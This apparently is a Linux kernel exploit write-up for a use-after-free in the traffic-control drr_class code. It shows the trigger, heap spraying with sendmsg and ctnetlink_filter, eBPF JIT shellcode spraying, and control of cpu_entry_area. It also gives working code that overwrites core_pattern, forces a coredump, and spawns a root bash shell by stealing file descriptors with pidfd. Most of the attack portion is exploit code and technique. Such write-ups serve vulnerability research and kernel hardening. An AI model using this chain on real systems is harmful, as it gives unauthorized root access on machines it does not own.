Using this vulnerability, we can set reference counter of qdisc class to 0, and then free qdisc class (by deleting the class) while it still attached to the active filter. When packet sent to the network, it will enqueue to the network scheduler. If the packet match to our filter, then it will return our freed qdisc class. Qdisc class object contain qdisc object which used to enqueue packets to the respective network interface via function pointer.
Snippet code if we use drr_class as target object as target object.
static int drr_enqueue(struct sk_buff *skb, struct Qdisc *sch,
struct sk_buff **to_free)
{
unsigned int len = qdisc_pkt_len(skb);
struct drr_sched *q = qdisc_priv(sch);
struct drr_class *cl;
int err = 0;
bool first;
cl = drr_classify(skb, sch, &err); // [1]
...
err = qdisc_enqueue(skb, cl->qdisc, to_free);
...
return err;
}
static inline int qdisc_enqueue(struct sk_buff *skb, struct Qdisc *sch,
struct sk_buff **to_free)
{
qdisc_calculate_pkt_len(skb, sch);
return sch->enqueue(skb, sch, to_free); // [2]
}
In [1], drr_classify will return freed drr_class
, then this freed object is used to get the qdisc object via cl->qdisc
and passed to qdisc_enqueue
function. If we can control cl->qdisc->enqueue
we can get RIP control at [2].
Our target objects is struct drr_class
that resides inside kmalloc-128.
Since there is no CONFIG_KMALLOC_SPLIT_VARSIZE, we can reallocated struct drr_class
with ctl_buf
. We use sendmsg to spray ctl_buf with controlled data in line [3].
static int ____sys_sendmsg(struct socket *sock, struct msghdr *msg_sys,
unsigned int flags, struct used_address *used_address,
unsigned int allowed_msghdr_flags)
...
BUILD_BUG_ON(sizeof(struct cmsghdr) !=
CMSG_ALIGN(sizeof(struct cmsghdr)));
if (ctl_len > sizeof(ctl)) {
ctl_buf = sock_kmalloc(sock->sk, ctl_len, GFP_KERNEL);
if (ctl_buf == NULL)
goto out;
}
err = -EFAULT;
if (copy_from_user(ctl_buf, msg_sys->msg_control_user, ctl_len)) //[3]
goto out_freectl;
Because CONFIG_KMALLOC_SPLIT_VARSIZE is enable, we need to find a struct we can spray in kmalloc-128 fixed cache. We found out struct ctnetlink_filter
is in the right cache. We can spray it and put payload.
static struct ctnetlink_filter *
ctnetlink_alloc_filter(const struct nlattr * const cda[], u8 family)
{
struct ctnetlink_filter *filter;
int err;
...
filter = kzalloc(sizeof(*filter), GFP_KERNEL);
...
err = ctnetlink_filter_parse_mark(&filter->mark, cda);
if (err)
goto err_filter;
err = ctnetlink_parse_filter(cda[CTA_FILTER], filter);
if (err < 0)
This technique allows 8-byte overwrite at offset 0x60 but requires CONFIG_NF_CONNTRACK_MARK (+ CONFIG_NETFILTER_ADVANCED + CONFIG_NETFILTER) enabled.
Our goal is to do some eBPF JIT spraying so later when we control kernel RIP, it will jump to the JIT page and execute our shellcode.
Linux kernel provide a socket option SO_ATTACH_FILTER
and let user to attach a classic BPF program to the socket for use as a filter of incoming packets.
By creating lots of sockets and attach to classic BPF program, we can spray a lot of eBPF programs in kernel.
struct sock_fprog prog = {
.len = TSIZE,
.filter = filter,
};
for(int i=0;i<NUM;i++){
int fd[2];
SYSCHK(socketpair(AF_UNIX,SOCK_DGRAM,0,fd));
SYSCHK(setsockopt(fd[0],SOL_SOCKET,26,&prog,sizeof(prog)));
}
As for the shellcode in our eBPF program, our goal is to overwrite /proc/sys/kernel/core_pattern
so later we can execute command as root by triggering crash. Here's what our shellcode did to achieve our goal:
- Use the
rdmsr
instruction to obtain the kernel text address. With RCX being set to MSR_LSTAR (0xc0000082
), we'll be able to obtain the address ofentry_SYSCALL_64
. - Calculate the address of
core_pattern
and_copy_from_user
. - Call
_copy_from_user(core_pattern, user_buf, 0x30);
, whereuser_buf
is a buffer in user space that stores the content we want to overwrite incore_pattern
.
We construct our eBPF program with the following form:
struct sock_filter table[] = {
{.code = BPF_LD + BPF_K, .k = 0xb3909090},
{.code = BPF_LD + BPF_K, .k = 0xb3909090},
.....................
};
The above example will be compiled into the following instructions after JIT:
b8 90 90 90 b3 mov eax, 0xb3909090
b8 90 90 90 b3 mov eax, 0xb3909090
If we can control kernel RIP to jump into the NOP instruction ( 0x90 ), the code will become:
90 nop
b3 b8 mov bl, 0xb8
90 nop
90 nop
90 nop
b3 b8 mov bl, 0xb8
....
We can see that by using an extra byte 0xb3
, we can skip the useless byte 0xb8
and execute our own shellcode. Notice that due to the "skipping part", we only have 3 bytes of space in each instruction, so we'll have to take care of that as well during our shellcode construction.
Linux kernel maps cpu_entry_area
into a fixed kernel address in x86 and that region is also used as exception stack. We can put our payload in the registers and trigger exception from user space. The exception handler will push our registers in the exception stack, allowing us to control data in fixed kernel address.
Catch the signals and skip the offending instruction.
signal(SIGFPE, handle);
signal(SIGTRAP, handle);
signal(SIGSEGV, handle);
setsid();
foo(payload);
Put our payload on registers in specific order
foo:
mov rsp,rdi
pop r15
pop r14
pop r13
pop r12
pop rbp
pop rbx
pop r11
pop r10
pop r9
pop r8
pop rax
pop rcx
pop rdx
pop rsi
pop rdi
div qword [0x1234000] ; trigger div 0 exception
As a result, we can control about 0x80 bytes in fixed kernel address.
We set cl->qdisc
to fixed kernel address that contain our controlled value, and then set enqueue
function pointer to guessed ebpf JIT address.
Once we control the kernel RIP and jump into the middle of our eBPF program, the shellcode we crafted will cause core_pattern being overwritten to |/proc/%P/fd/666
:
We then use memfd and write an executable file payload in fd 666.
int check_core()
{
// Check if /proc/sys/kernel/core_pattern has been overwritten
char buf[0x100] = {};
int core = open("/proc/sys/kernel/core_pattern", O_RDONLY);
read(core, buf, sizeof(buf));
close(core);
return strncmp(buf, "|/proc/%P/fd/666", 0x10) == 0;
}
void crash(char *cmd)
{
int memfd = memfd_create("", 0);
SYSCHK(sendfile(memfd, open("root", 0), 0, 0xffffffff));
dup2(memfd, 666);
close(memfd);
while (check_core() == 0)
sleep(1);
*(size_t *)0 = 0;
}
Later when coredump happened, it will execute our executable file as root in root namespace:
*(size_t*)0=0; //trigger coredump
Executable file root
is used to spawn shell when coredump happened. This is the code looks like:
void* job(void* x){
FILE* fp = popen("pidof billy","r");
fread(buf,1,0x100,fp);
fclose(fp);
int pid = strtoull(buf,0,10);
int pfd = syscall(SYS_pidfd_open,pid,0);
int stdinfd = syscall(SYS_pidfd_getfd, pfd, 0, 0);
int stdoutfd = syscall(SYS_pidfd_getfd, pfd, 1, 0);
int stderrfd = syscall(SYS_pidfd_getfd, pfd, 2, 0);
dup2(stdinfd,0);
dup2(stdoutfd,1);
dup2(stderrfd,2);
execlp("bash","bash",NULL);
}
int main(int argc,char** argv){
job(0);
}